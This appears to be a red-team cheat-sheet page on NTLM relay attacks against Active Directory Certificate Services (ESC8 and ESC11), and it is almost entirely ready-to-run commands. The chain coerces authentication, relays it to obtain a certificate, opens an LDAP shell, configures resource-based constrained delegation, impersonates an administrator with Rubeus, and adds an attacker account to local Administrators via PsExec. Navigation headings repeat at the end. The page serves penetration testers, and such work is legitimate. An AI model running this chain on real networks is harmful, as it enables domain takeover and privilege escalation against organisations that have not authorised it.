HTTP / RPC relaying

NTLM relay prerequisites (external link)

Set up ntlmrelayx

Required cryptography and pyOpenSSL versions:

powershell

pip install cryptography==41.0.7
pip install pyOpenSSL==23.2.0

NTLM relay to AD CS Web Enrollment (ESC8)

Run ntlmrelayx to relay incoming connections to vulnerable CA HTTP(S) web enrollment.

powershell

ntlmrelayx.py -t http://<ca-name>/certsrv/ -smb2support --adcs --template <VULN-TEMPLATE-NAME>

TODO

NTLM relay to AD CS RPC interface (ESC11)

Run ntlmrelayx to relay incoming connections to RPC.

powershell

python ./examples/ntlmrelayx.py -t rpc://<vuln-ca.lab.internal> --template <cert-temp-name> --smb-port 8445 -rpc-mode ICPR -icpr-ca-name <vuln-ca-name> -smb2support

Coerce authentication with coercer.

coercer coerce -u <user> -p <password> -l <netbios-name-of-listener> -t <target-ip>

Use the issued certificate to authenticate with certipy.

certipy auth -pfx certificate.pfx -ldap-shell -dc-ip <dc-ip>

Configure resource-based constrained delegation (RBCD) in the LDAP shell.

set_rbcd ATTACKER-HOST$ VICTIM-HOST$

Abuse RBCD with Rubeus.

Rubeus.exe s4u /user:<VICTIM-HOST$> /rc4:<attacker-machine-rc4-hash> /impersonateuser:<admin> /msdsspn:cifs/TARGET-HOST> /ptt /nowrap

Add attacker user to local admin group.

PsExec.exe \\<victim-host> net localgroup Administrators <attacker-user> /add

Kerberos delegation

Basic knowledge

Misconfigurations

HTTP / RPC relaying

Set up ntlmrelayx

NTLM relay to AD CS Web Enrollment (ESC8)

NTLM relay to AD CS RPC interface (ESC11)

HTTP / RPC relaying ​

Set up ntlmrelayx ​

NTLM relay to AD CS Web Enrollment (ESC8) ​

NTLM relay to AD CS RPC interface (ESC11) ​

HTTP / RPC relaying

Set up ntlmrelayx

NTLM relay to AD CS Web Enrollment (ESC8)

NTLM relay to AD CS RPC interface (ESC11)